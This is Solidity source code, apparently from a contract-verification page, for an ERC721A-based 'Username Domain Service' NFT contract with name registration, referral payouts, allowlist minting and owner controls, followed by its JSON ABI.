    mapping(uint256 => address) private _tokenApprovals;

    // Mapping from owner to operator approvals
    mapping(address => mapping(address => bool)) private _operatorApprovals;

    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
        _currentIndex = _startTokenId();
    }

    /**
     * To change the starting tokenId, please override this function.
     */
    function _startTokenId() internal view virtual returns (uint256) {
        return 1;
    }

    /**
     * @dev Burned tokens are calculated here, use _totalMinted() if you want to count just minted tokens.
     */
    function totalSupply() public view override returns (uint256) {
        // Counter underflow is impossible as _burnCounter cannot be incremented
        // more than _currentIndex - _startTokenId() times
        unchecked {
            return _currentIndex - _burnCounter - _startTokenId();
        }
    }

    /**
     * Returns the total amount of tokens minted in the contract.
     */
    function _totalMinted() internal view returns (uint256) {
        // Counter underflow is impossible as _currentIndex does not decrement,
        // and it is initialized to _startTokenId()
        unchecked {
            return _currentIndex - _startTokenId();
        }
    }

    /**
     * @dev See {IERC165-supportsInterface}.
     */
    function supportsInterface(bytes4 interfaceId) public view virtual override(ERC165, IERC165) returns (bool) {
        return
            interfaceId == type(IERC721).interfaceId ||
            interfaceId == type(IERC721Metadata).interfaceId ||
            super.supportsInterface(interfaceId);
    }

    /**
     * @dev See {IERC721-balanceOf}.
     */
    function balanceOf(address owner) public view override returns (uint256) {
        if (owner == address(0)) revert BalanceQueryForZeroAddress();
        return uint256(_addressData[owner].balance);
    }

    /**
     * Returns the number of tokens minted by `owner`.
     */
    function _numberMinted(address owner) internal view returns (uint256) {
        return uint256(_addressData[owner].numberMinted);
    }

    /**
     * Returns the number of tokens burned by or on behalf of `owner`.
     */
    function _numberBurned(address owner) internal view returns (uint256) {
        return uint256(_addressData[owner].numberBurned);
    }

    /**
     * Returns the auxillary data for `owner`. (e.g. number of whitelist mint slots used).
     */
    function _getAux(address owner) internal view returns (uint64) {
        return _addressData[owner].aux;
    }

    /**
     * Sets the auxillary data for `owner`. (e.g. number of whitelist mint slots used).
     * If there are multiple variables, please pack them into a uint64.
     */
    function _setAux(address owner, uint64 aux) internal {
        _addressData[owner].aux = aux;
    }

    /**
     * Gas spent here starts off proportional to the maximum mint batch size.
     * It gradually moves to O(1) as tokens get transferred around in the collection over time.
     */
    function _ownershipOf(uint256 tokenId) internal view returns (TokenOwnership memory) {
        uint256 curr = tokenId;

        unchecked {
            if (_startTokenId() <= curr) if (curr < _currentIndex) {
                TokenOwnership memory ownership = _ownerships[curr];
                if (!ownership.burned) {
                    if (ownership.addr != address(0)) {
                        return ownership;
                    }
                    // Invariant:
                    // There will always be an ownership that has an address and is not burned
                    // before an ownership that does not have an address and is not burned.
                    // Hence, curr will not underflow.
                    while (true) {
                        curr--;
                        ownership = _ownerships[curr];
                        if (ownership.addr != address(0)) {
                            return ownership;
                        }
                    }
                }
            }
        }
        revert OwnerQueryForNonexistentToken();
    }

    /**
     * @dev See {IERC721-ownerOf}.
     */
    function ownerOf(uint256 tokenId) public view override returns (address) {
        return _ownershipOf(tokenId).addr;
    }

    /**
     * @dev See {IERC721Metadata-name}.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev See {IERC721Metadata-symbol}.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev See {IERC721Metadata-tokenURI}.
     */
    function tokenURI(uint256 tokenId) public view virtual override returns (string memory) {
        if (!_exists(tokenId)) revert URIQueryForNonexistentToken();

        string memory baseURI = _baseURI();
        return bytes(baseURI).length != 0 ? string(abi.encodePacked(baseURI, tokenIDandAddress[tokenId])) : '';
    }

    /**
     * @dev Base URI for computing {tokenURI}. If set, the resulting URI for each
     * token will be the concatenation of the `baseURI` and the `tokenId`. Empty
     * by default, can be overriden in child contracts.
     */
    function _baseURI() internal view virtual returns (string memory) {
        return '';
    }

    /**
     * @dev See {IERC721-approve}.
     */
    function approve(address to, uint256 tokenId) public override {
        address owner = ERC721A.ownerOf(tokenId);
        if (to == owner) revert ApprovalToCurrentOwner();

        if (_msgSender() != owner) if(!isApprovedForAll(owner, _msgSender())) {
            revert ApprovalCallerNotOwnerNorApproved();
        }

        _approve(to, tokenId, owner);
    }

    /**
     * @dev See {IERC721-getApproved}.
     */
    function getApproved(uint256 tokenId) public view override returns (address) {
        if (!_exists(tokenId)) revert ApprovalQueryForNonexistentToken();

        return _tokenApprovals[tokenId];
    }

    /**
     * @dev See {IERC721-setApprovalForAll}.
     */
    function setApprovalForAll(address operator, bool approved) public virtual override {
        if (operator == _msgSender()) revert ApproveToCaller();

        _operatorApprovals[_msgSender()][operator] = approved;
        emit ApprovalForAll(_msgSender(), operator, approved);
    }

    /**
     * @dev See {IERC721-isApprovedForAll}.
     */
    function isApprovedForAll(address owner, address operator) public view virtual override returns (bool) {
        return _operatorApprovals[owner][operator];
    }

    /**
     * @dev See {IERC721-transferFrom}.
     */
    function transferFrom(
        address from,
        address to,
        uint256 tokenId
    ) public virtual override {
        _transfer(from, to, tokenId);
    }

    /**
     * @dev See {IERC721-safeTransferFrom}.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId
    ) public virtual override {
        safeTransferFrom(from, to, tokenId, '');
    }

    /**
     * @dev See {IERC721-safeTransferFrom}.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId,
        bytes memory _data
    ) public virtual override {
        _transfer(from, to, tokenId);
        if (to.isContract()) if(!_checkContractOnERC721Received(from, to, tokenId, _data)) {
            revert TransferToNonERC721ReceiverImplementer();
        }
    }

    /**
     * @dev Returns whether `tokenId` exists.
     *
     * Tokens can be managed by their owner or approved accounts via {approve} or {setApprovalForAll}.
     *
     * Tokens start existing when they are minted (`_mint`),
     */
    function _exists(uint256 tokenId) internal view returns (bool) {
        return _startTokenId() <= tokenId && tokenId < _currentIndex && !_ownerships[tokenId].burned;
    }

    /**
     * @dev Equivalent to `_safeMint(to, quantity, '')`.
     */
    function _safeMint(address to, uint256 quantity) internal {
        _safeMint(to, quantity, '');
    }

    /**
     * @dev Safely mints `quantity` tokens and transfers them to `to`.
     *
     * Requirements:
     *
     * - If `to` refers to a smart contract, it must implement
     *   {IERC721Receiver-onERC721Received}, which is called for each safe transfer.
     * - `quantity` must be greater than 0.
     *
     * Emits a {Transfer} event.
     */
    function _safeMint(
        address to,
        uint256 quantity,
        bytes memory _data
    ) internal {
        uint256 startTokenId = _currentIndex;
        if (to == address(0)) revert MintToZeroAddress();
        if (quantity == 0) revert MintZeroQuantity();

        _beforeTokenTransfers(address(0), to, startTokenId, quantity);

        // Overflows are incredibly unrealistic.
        // balance or numberMinted overflow if current value of either + quantity > 1.8e19 (2**64) - 1
        // updatedIndex overflows if _currentIndex + quantity > 1.2e77 (2**256) - 1
        unchecked {
            _addressData[to].balance += uint64(quantity);
            _addressData[to].numberMinted += uint64(quantity);

            _ownerships[startTokenId].addr = to;
            _ownerships[startTokenId].startTimestamp = uint64(block.timestamp);

            uint256 updatedIndex = startTokenId;
            uint256 end = updatedIndex + quantity;

            if (to.isContract()) {
                do {
                    emit Transfer(address(0), to, updatedIndex);
                    if (!_checkContractOnERC721Received(address(0), to, updatedIndex++, _data)) {
                        revert TransferToNonERC721ReceiverImplementer();
                    }
                } while (updatedIndex < end);
                // Reentrancy protection
                if (_currentIndex != startTokenId) revert();
            } else {
                do {
                    emit Transfer(address(0), to, updatedIndex++);
                } while (updatedIndex < end);
            }
            _currentIndex = updatedIndex;
        }
        _afterTokenTransfers(address(0), to, startTokenId, quantity);
    }

    /**
     * @dev Mints `quantity` tokens and transfers them to `to`.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - `quantity` must be greater than 0.
     *
     * Emits a {Transfer} event.
     */
    function _mint(address to, uint256 quantity) internal {
        uint256 startTokenId = _currentIndex;
        if (to == address(0)) revert MintToZeroAddress();
        if (quantity == 0) revert MintZeroQuantity();

        _beforeTokenTransfers(address(0), to, startTokenId, quantity);

        // Overflows are incredibly unrealistic.
        // balance or numberMinted overflow if current value of either + quantity > 1.8e19 (2**64) - 1
        // updatedIndex overflows if _currentIndex + quantity > 1.2e77 (2**256) - 1
        unchecked {
            _addressData[to].balance += uint64(quantity);
            _addressData[to].numberMinted += uint64(quantity);

            _ownerships[startTokenId].addr = to;
            _ownerships[startTokenId].startTimestamp = uint64(block.timestamp);

            uint256 updatedIndex = startTokenId;
            uint256 end = updatedIndex + quantity;

            do {
                emit Transfer(address(0), to, updatedIndex++);
            } while (updatedIndex < end);

            _currentIndex = updatedIndex;
        }
        _afterTokenTransfers(address(0), to, startTokenId, quantity);
    }

    /**
     * @dev Transfers `tokenId` from `from` to `to`.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - `tokenId` token must be owned by `from`.
     *
     * Emits a {Transfer} event.
     */
    function _transfer(
        address from,
        address to,
        uint256 tokenId
    ) private {
        TokenOwnership memory prevOwnership = _ownershipOf(tokenId);

        if (prevOwnership.addr != from) revert TransferFromIncorrectOwner();

        bool isApprovedOrOwner = (_msgSender() == from ||
            isApprovedForAll(from, _msgSender()) ||
            getApproved(tokenId) == _msgSender());

        if (!isApprovedOrOwner) revert TransferCallerNotOwnerNorApproved();
        if (to == address(0)) revert TransferToZeroAddress();

        _beforeTokenTransfers(from, to, tokenId, 1);

        // Clear approvals from the previous owner
        _approve(address(0), tokenId, from);

        // Underflow of the sender's balance is impossible because we check for
        // ownership above and the recipient's balance can't realistically overflow.
        // Counter overflow is incredibly unrealistic as tokenId would have to be 2**256.
        unchecked {
            _addressData[from].balance -= 1;
            _addressData[to].balance += 1;

            TokenOwnership storage currSlot = _ownerships[tokenId];
            currSlot.addr = to;
            currSlot.startTimestamp = uint64(block.timestamp);

            
            // If the ownership slot of tokenId+1 is not explicitly set, that means the transfer initiator owns it.
            // Set the slot of tokenId+1 explicitly in storage to maintain correctness for ownerOf(tokenId+1) calls.
            uint256 nextTokenId = tokenId + 1;
            TokenOwnership storage nextSlot = _ownerships[nextTokenId];
            if (nextSlot.addr == address(0)) {
                // This will suffice for checking _exists(nextTokenId),
                // as a burned slot cannot contain the zero address.
                if (nextTokenId != _currentIndex) {
                    nextSlot.addr = from;
                    nextSlot.startTimestamp = prevOwnership.startTimestamp;
                }
            }
        }

        emit Transfer(from, to, tokenId);
        _afterTokenTransfers(from, to, tokenId, 1);
    }

    /**
     * @dev Equivalent to `_burn(tokenId, false)`.
     */
    function _burn(uint256 tokenId) internal virtual {
        _burn(tokenId, false);
    }

    /**
     * @dev Destroys `tokenId`.
     * The approval is cleared when the token is burned.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     *
     * Emits a {Transfer} event.
     */
    function _burn(uint256 tokenId, bool approvalCheck) internal virtual {
        TokenOwnership memory prevOwnership = _ownershipOf(tokenId);

        address from = prevOwnership.addr;

        if (approvalCheck) {
            bool isApprovedOrOwner = (_msgSender() == from ||
                isApprovedForAll(from, _msgSender()) ||
                getApproved(tokenId) == _msgSender());

            if (!isApprovedOrOwner) revert TransferCallerNotOwnerNorApproved();
        }

        _beforeTokenTransfers(from, address(0), tokenId, 1);

        // Clear approvals from the previous owner
        _approve(address(0), tokenId, from);

        // Underflow of the sender's balance is impossible because we check for
        // ownership above and the recipient's balance can't realistically overflow.
        // Counter overflow is incredibly unrealistic as tokenId would have to be 2**256.
        unchecked {
            AddressData storage addressData = _addressData[from];
            addressData.balance -= 1;
            addressData.numberBurned += 1;

            // Keep track of who burned the token, and the timestamp of burning.
            TokenOwnership storage currSlot = _ownerships[tokenId];
            currSlot.addr = from;
            currSlot.startTimestamp = uint64(block.timestamp);
            currSlot.burned = true;

            // If the ownership slot of tokenId+1 is not explicitly set, that means the burn initiator owns it.
            // Set the slot of tokenId+1 explicitly in storage to maintain correctness for ownerOf(tokenId+1) calls.
            uint256 nextTokenId = tokenId + 1;
            TokenOwnership storage nextSlot = _ownerships[nextTokenId];
            if (nextSlot.addr == address(0)) {
                // This will suffice for checking _exists(nextTokenId),
                // as a burned slot cannot contain the zero address.
                if (nextTokenId != _currentIndex) {
                    nextSlot.addr = from;
                    nextSlot.startTimestamp = prevOwnership.startTimestamp;
                }
            }
        }

        emit Transfer(from, address(0), tokenId);
        _afterTokenTransfers(from, address(0), tokenId, 1);

        // Overflow not possible, as _burnCounter cannot be exceed _currentIndex times.
        unchecked {
            _burnCounter++;
        }
    }

    /**
     * @dev Approve `to` to operate on `tokenId`
     *
     * Emits a {Approval} event.
     */
    function _approve(
        address to,
        uint256 tokenId,
        address owner
    ) private {
        _tokenApprovals[tokenId] = to;
        emit Approval(owner, to, tokenId);
    }

    /**
     * @dev Internal function to invoke {IERC721Receiver-onERC721Received} on a target contract.
     *
     * @param from address representing the previous owner of the given token ID
     * @param to target address that will receive the tokens
     * @param tokenId uint256 ID of the token to be transferred
     * @param _data bytes optional data to send along with the call
     * @return bool whether the call correctly returned the expected magic value
     */
    function _checkContractOnERC721Received(
        address from,
        address to,
        uint256 tokenId,
        bytes memory _data
    ) private returns (bool) {
        try IERC721Receiver(to).onERC721Received(_msgSender(), from, tokenId, _data) returns (bytes4 retval) {
            return retval == IERC721Receiver(to).onERC721Received.selector;
        } catch (bytes memory reason) {
            if (reason.length == 0) {
                revert TransferToNonERC721ReceiverImplementer();
            } else {
                assembly {
                    revert(add(32, reason), mload(reason))
                }
            }
        }
    }

    /**
     * @dev Hook that is called before a set of serially-ordered token ids are about to be transferred. This includes minting.
     * And also called before burning one token.
     *
     * startTokenId - the first token id to be transferred
     * quantity - the amount to be transferred
     *
     * Calling conditions:
     *
     * - When `from` and `to` are both non-zero, `from`'s `tokenId` will be
     * transferred to `to`.
     * - When `from` is zero, `tokenId` will be minted for `to`.
     * - When `to` is zero, `tokenId` will be burned by `from`.
     * - `from` and `to` are never both zero.
     */
    function _beforeTokenTransfers(
        address from,
        address to,
        uint256 startTokenId,
        uint256 quantity
    ) internal virtual {}

    /**
     * @dev Hook that is called after a set of serially-ordered token ids have been transferred. This includes
     * minting.
     * And also called after one token has been burned.
     *
     * startTokenId - the first token id to be transferred
     * quantity - the amount to be transferred
     *
     * Calling conditions:
     *
     * - When `from` and `to` are both non-zero, `from`'s `tokenId` has been
     * transferred to `to`.
     * - When `from` is zero, `tokenId` has been minted for `to`.
     * - When `to` is zero, `tokenId` has been burned by `from`.
     * - `from` and `to` are never both zero.
     */
    function _afterTokenTransfers(
        address from,
        address to,
        uint256 startTokenId,
        uint256 quantity
    ) internal virtual {}
}



pragma solidity ^0.8.4;




contract Username is ERC721A, Ownable, ReentrancyGuard {
    using Strings for uint256;
    uint256 public cost = 10000000000000000;
    uint256 public ref = 20;
    uint256 public ref_owner = 20;
    uint256 public ref_discount = 20;
    uint256 public domains_fee = 0;
    
    

    string private BASE_URI = 'https://nftmetadata.live/username/';
    bool public IS_SALE_ACTIVE = true;
    bool public IS_ALLOWLIST_ACTIVE = false;
    mapping(address => bool) public allowlistAddresses;
    mapping(string => address) public resolveAddress;
    mapping(address => string) public primaryAddress;
    mapping(string => mapping(string => string)) public dataAddress;
    bytes32 public merkleRoot;
    constructor() ERC721A("Username Domain Service", "USER") {
        tokenIDandAddress[_currentIndex]="username";
        tokenAddressandID["username"]=_currentIndex;
        resolveAddress["username"]=msg.sender;
        _safeMint(msg.sender,1);
    }

    
    function _baseURI() internal view virtual override returns (string memory) {
        return BASE_URI;
    }

    function setAddress(string calldata ether_name, address newresolve) external {
         TokenOwnership memory Ownership = _ownershipOf(tokenAddressandID[ether_name]);
        if (Ownership.addr != msg.sender) revert("Error");
        

    bytes memory result = bytes(primaryAddress[resolveAddress[ether_name]]);
        if (keccak256(result) == keccak256(bytes(ether_name))) {
            primaryAddress[resolveAddress[ether_name]]="";
        }
        resolveAddress[ether_name]=newresolve;
    }

    function setPrimaryAddress(string calldata ether_name) external {
        require(resolveAddress[ether_name]==msg.sender, "Error");
        primaryAddress[msg.sender]=ether_name;
    }


    function setDataAddress(string calldata ether_name,string calldata setArea, string  memory newDatas) external {
         TokenOwnership memory Ownership = _ownershipOf(tokenAddressandID[ether_name]);

        if (Ownership.addr != msg.sender) revert("Error");
        dataAddress[ether_name][setArea]=newDatas;
    }

    function getDataAddress(string memory ether_name, string calldata Area) public view returns(string memory) {
        return dataAddress[ether_name][Area];
    }


    function setBaseURI(string memory customBaseURI_) external onlyOwner {
        BASE_URI = customBaseURI_;
    }

    
    

    function setPrice(uint256 customPrice) external onlyOwner {
        cost = customPrice;
    }

    function setRefSettings(uint ref_,uint ref_owner_,uint ref_discount_,uint domains_fee_) external onlyOwner {
        ref = ref_;
        ref_owner = ref_owner_;
        ref_discount = ref_discount_;
        domains_fee = domains_fee_;

    }


    function setSaleActive(bool saleIsActive) external onlyOwner {
        IS_SALE_ACTIVE = saleIsActive;
    }

     function setAllowListSaleActive(bool WhitesaleIsActive) external onlyOwner {
        IS_ALLOWLIST_ACTIVE = WhitesaleIsActive;
    }


    function register(address ref_address, string memory ether_name)
        public
        payable
    {   
        uint256 price = cost;
        bool is_ref=false;
        uint256 ref_cost=0;
        require(bytes(ether_name).length>0,"Write a name");
        if (ref_address== 0x0000000000000000000000000000000000000000) {
        price=cost;
        } else {
        if (bytes(primaryAddress[ref_address]).length>0){
        ref_cost=price*ref_owner/100;    
        } else {
        ref_cost=price*ref/100;
        }
        price = price*(100-ref_discount)/100;
        is_ref=true;
        }
        require (tokenAddressandID[ether_name] == 0 , "This is already taken"); 
        require(IS_SALE_ACTIVE, "Sale is not active!");
        require(msg.value >= price, "Insufficient funds!");
        tokenIDandAddress[_currentIndex]=ether_name;
        tokenAddressandID[ether_name]=_currentIndex;
        resolveAddress[ether_name]=msg.sender;
         if (is_ref) {
        payable(ref_address).transfer(ref_cost);
        }
        _safeMint(msg.sender,1);
    }

     function allowList(string memory ether_name, bytes32[] calldata _merkleProof)
        public
        payable
    {      
            require(IS_ALLOWLIST_ACTIVE, "Allow List sale is not active!");
            bytes32 leaf = keccak256(abi.encodePacked(msg.sender));
            require(MerkleProof.verify(_merkleProof, merkleRoot, leaf),"Invalid proof!");
            require(bytes(ether_name).length>0,"Write a name");
            require(allowlistAddresses[msg.sender]!=true, "Claimed!");
            require (tokenAddressandID[ether_name] == 0 , "This is already taken"); 
            allowlistAddresses[msg.sender] = true;
            tokenIDandAddress[_currentIndex]=ether_name;
            tokenAddressandID[ether_name]=_currentIndex;
            resolveAddress[ether_name]=msg.sender;
            _safeMint(msg.sender,1);
    }




    
    function namediff(uint256 tokenId , string calldata new_ether_name) external onlyOwner {
        tokenIDandAddress[tokenId]=new_ether_name;
        tokenAddressandID[new_ether_name]=tokenId;
    }


function walletOfOwnerName(address _owner)
    public
    view
    returns (string[] memory)
  {
    uint256 ownerTokenCount = balanceOf(_owner);
    string[] memory ownedTokenIds = new string[](ownerTokenCount);
    uint256 currentTokenId = 1;
    uint256 ownedTokenIndex = 0;

    while (ownedTokenIndex < ownerTokenCount) {
      address currentTokenOwner = ownerOf(currentTokenId);

      if (currentTokenOwner == _owner) {
        ownedTokenIds[ownedTokenIndex] = tokenIDandAddress[currentTokenId];

        ownedTokenIndex++;
      }

      currentTokenId++;
    }

    return ownedTokenIds;
  }


function lastAddresses(uint256 count)
    public
    view
    returns (string[] memory)
  {
    uint256 total = totalSupply();
    string[] memory lastAddr = new string[](count);
    uint256 currentId = total - count;
    uint256 ownedTokenIndex = 0;
    require(currentId>=0,"Invalid");
    while (total > currentId) {
        lastAddr[ownedTokenIndex] = tokenIDandAddress[total];
        ownedTokenIndex++;
      total--;
    }

    return lastAddr;
  }


function setMerkleRoot(bytes32 _newMerkleRoot) external onlyOwner {
        merkleRoot = _newMerkleRoot;
    }


        /** PAYOUT **/

    function withdraw() public onlyOwner nonReentrant {
        uint256 balance = address(this).balance;
        Address.sendValue(payable(0x0028eEd5742C97fF29635ef965a150bf5049CEB6),balance);
        }

}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[],"name":"ApprovalCallerNotOwnerNorApproved","type":"error"},{"inputs":[],"name":"ApprovalQueryForNonexistentToken","type":"error"},{"inputs":[],"name":"ApprovalToCurrentOwner","type":"error"},{"inputs":[],"name":"ApproveToCaller","type":"error"},{"inputs":[],"name":"BalanceQueryForZeroAddress","type":"error"},{"inputs":[],"name":"MintToZeroAddress","type":"error"},{"inputs":[],"name":"MintZeroQuantity","type":"error"},{"inputs":[],"name":"OwnerQueryForNonexistentToken","type":"error"},{"inputs":[],"name":"TransferCallerNotOwnerNorApproved","type":"error"},{"inputs":[],"name":"TransferFromIncorrectOwner","type":"error"},{"inputs":[],"name":"TransferToNonERC721ReceiverImplementer","type":"error"},{"inputs":[],"name":"TransferToZeroAddress","type":"error"},{"inputs":[],"name":"URIQueryForNonexistentToken","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"approved","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"operator","type":"address"},{"indexed":false,"internalType":"bool","name":"approved","type":"bool"}],"name":"ApprovalForAll","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"IS_ALLOWLIST_ACTIVE","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"IS_SALE_ACTIVE","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"string","name":"ether_name","type":"string"},{"internalType":"bytes32[]","name":"_merkleProof","type":"bytes32[]"}],"name":"allowList","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"allowlistAddresses","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"approve","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"cost","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"string","name":"","type":"string"},{"internalType":"string","name":"","type":"string"}],"name":"dataAddress","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"domains_fee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"getApproved","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"string","name":"ether_name","type":"string"},{"internalType":"string","name":"Area","type":"string"}],"name":"getDataAddress","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"operator","type":"address"}],"name":"isApprovedForAll","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"count","type":"uint256"}],"name":"lastAddresses","outputs":[{"internalType":"string[]","name":"","type":"string[]"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"merkleRoot","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"},{"internalType":"string","name":"new_ether_name","type":"string"}],"name":"namediff","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"ownerOf","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"primaryAddress","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"ref","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"ref_discount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"ref_owner","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"ref_address","type":"address"},{"internalType":"string","name":"ether_name","type":"string"}],"name":"register","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"string","name":"","type":"string"}],"name":"resolveAddress","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"},{"internalType":"bytes","name":"_data","type":"bytes"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"string","name":"ether_name","type":"string"},{"internalType":"address","name":"newresolve","type":"address"}],"name":"setAddress","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bool","name":"WhitesaleIsActive","type":"bool"}],"name":"setAllowListSaleActive","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"operator","type":"address"},{"internalType":"bool","name":"approved","type":"bool"}],"name":"setApprovalForAll","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"string","name":"customBaseURI_","type":"string"}],"name":"setBaseURI","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"string","name":"ether_name","type":"string"},{"internalType":"string","name":"setArea","type":"string"},{"internalType":"string","name":"newDatas","type":"string"}],"name":"setDataAddress","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes32","name":"_newMerkleRoot","type":"bytes32"}],"name":"setMerkleRoot","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"customPrice","type":"uint256"}],"name":"setPrice","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"string","name":"ether_name","type":"string"}],"name":"setPrimaryAddress","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"ref_","type":"uint256"},{"internalType":"uint256","name":"ref_owner_","type":"uint256"},{"internalType":"uint256","name":"ref_discount_","type":"uint256"},{"internalType":"uint256","name":"domains_fee_","type":"uint256"}],"name":"setRefSettings","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bool","name":"saleIsActive","type":"bool"}],"name":"setSaleActive","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes4","name":"interfaceId","type":"bytes4"}],"name":"supportsInterface","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"string","name":"","type":"string"}],"name":"tokenAddressandID","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"","type":"uint256"}],"name":"tokenIDandAddress","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"tokenURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"transferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_owner","type":"address"}],"name":"walletOfOwnerName","outputs":[{"internalType":"string[]","name":"","type":"string[]"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"withdraw","outputs":[],"stateMutability":"nonpayable","type":"function"}]

